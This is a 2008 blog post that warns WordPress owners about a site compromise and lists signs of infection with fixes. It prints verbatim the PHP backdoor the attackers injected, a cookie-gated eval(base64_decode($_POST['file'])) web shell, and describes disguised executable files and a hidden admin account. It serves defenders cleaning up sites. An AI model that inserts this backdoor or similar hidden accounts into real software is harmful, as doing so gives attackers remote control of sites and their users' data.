ArtsAutosBooksBusinessEducationEntertainmentFamilyFashionFoodGamesGenderHealthHolidaysHomeHubPagesPersonal FinancePetsPoliticsReligionSportsTechnologyTravel
  • »
  • Technology»
  • Internet & the Web»
  • Blogs

Bloggers-Wordpress Exploit Urgent Info

Updated on October 29, 2008

I hate malicious hackers

If you are a wordpress blogger, you need to check your blogs asap!

There is an exploit that is hitting a lot of blogs. You must check yours, you may already be hacked. I am busy checking all of mine. I have hundreds of wp blogs, and this is going to be a real pain. Others I have spoken to about this have noticed their traffic or revenues were down, then found this hack.

The bad part about this, the exploit gives the hacker access to your passwords, both to your blogs and your sql databases. Very ugly stuff.

This is only for users of the blog platform wordpress. If you blog on Hubpages, or Blogger, you have nothing to worry about.

First Sign of this Exploit

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters numbers and numbers vary.

Fix: open the infected file and delete that code.Use an FTP client like filezilla or flashfxp, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.

Second Sign of this exploit

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.

Fix: delete the files.

Third Sign of this Exploit

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Fix: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

Fourth Sign of this Exploit

New “WordPress” user in database (hidden in the admin panel users page)

user “WordPress”, with no info save a password, and an add date of all zeroes.

Fix: delete the user. You need to access your database through phpMyAdmin or something similar.

Fifth Sign of Exploit

WordPress version changed to 2.5

I’m logged into a site I know is still running an older version, but the footer in the admin panels say 2.5 now.

Fix: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.


    0 of 8192 characters used
    Post Comment

    No comments yet.